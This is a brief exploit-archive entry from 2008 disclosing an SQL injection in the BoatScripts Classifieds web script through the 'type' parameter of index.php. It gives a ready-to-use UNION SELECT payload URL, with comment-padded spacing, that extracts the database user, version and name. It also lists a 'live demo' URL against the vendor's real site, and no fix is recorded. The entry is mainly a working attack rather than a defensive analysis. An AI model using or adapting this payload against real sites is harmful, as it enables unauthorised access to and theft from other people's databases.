BoatScripts Classifieds (index.php type) SQL Injection Vulnerability

2008-06-18 00:00:00

BoatScripts Classifieds Sql INjection

By Stack
Home v4-team.com

poc : http://site.co.il/index.php?type=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database())/*
live demo tested
http://www.boatscripts.com/boats/index.php?type=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database())/*

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.